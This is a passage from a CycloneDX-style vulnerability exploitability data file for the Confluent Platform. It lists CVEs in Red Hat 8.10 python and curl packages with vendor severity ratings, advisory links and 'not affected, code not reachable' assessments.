          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13837",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13837"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13837"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036"
        },
        {
          "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b"
        },
        {
          "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70"
        },
        {
          "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb"
        },
        {
          "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111"
        },
        {
          "url": "https://github.com/python/cpython/issues/119342"
        },
        {
          "url": "https://github.com/python/cpython/pull/119343"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-13837.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
        }
      ],
      "published": "2025-12-01T18:16:04+00:00",
      "updated": "2026-06-17T08:34:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14017",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14017"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14017"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:35:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14524",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        601
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14524"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg"
        },
        {
          "url": "https://hackerone.com/reports/3459417"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-06-17T08:36:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
